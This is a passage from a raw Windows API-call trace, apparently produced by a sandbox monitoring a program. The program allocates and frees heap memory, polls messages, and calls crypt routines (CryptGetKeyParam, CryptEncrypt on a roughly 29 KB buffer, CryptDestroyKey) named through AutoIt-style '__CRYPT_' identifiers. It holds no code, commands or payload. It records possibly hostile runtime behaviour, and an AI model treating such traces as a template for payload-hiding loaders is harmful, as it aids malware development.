lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.534] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.534] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.537] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.537] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.538] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.538] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.538] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.538] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.538] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.538] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.539] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.539] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x72dd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x72e0) returned 1 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.539] CharLowerBuffW (in: lpsz="byte[29409]", cchLength=0xb | out: lpsz="byte[29409]") returned 0xb [0032.539] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.541] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.541] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.542] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x96a8d0*, pdwDataLen=0x6ae220*=0x72dd, dwBufLen=0x72e0 | out: pbData=0x96a8d0*, pdwDataLen=0x6ae220*=0x72e0) returned 1 [0032.542] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.542] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.542] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.544] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.544] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.544] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.544] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.544] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.549] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.549] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.549] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.552] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.552] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.552] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.552] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.552] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.552] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0032.553] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.553] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.553] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.553] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.553] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, 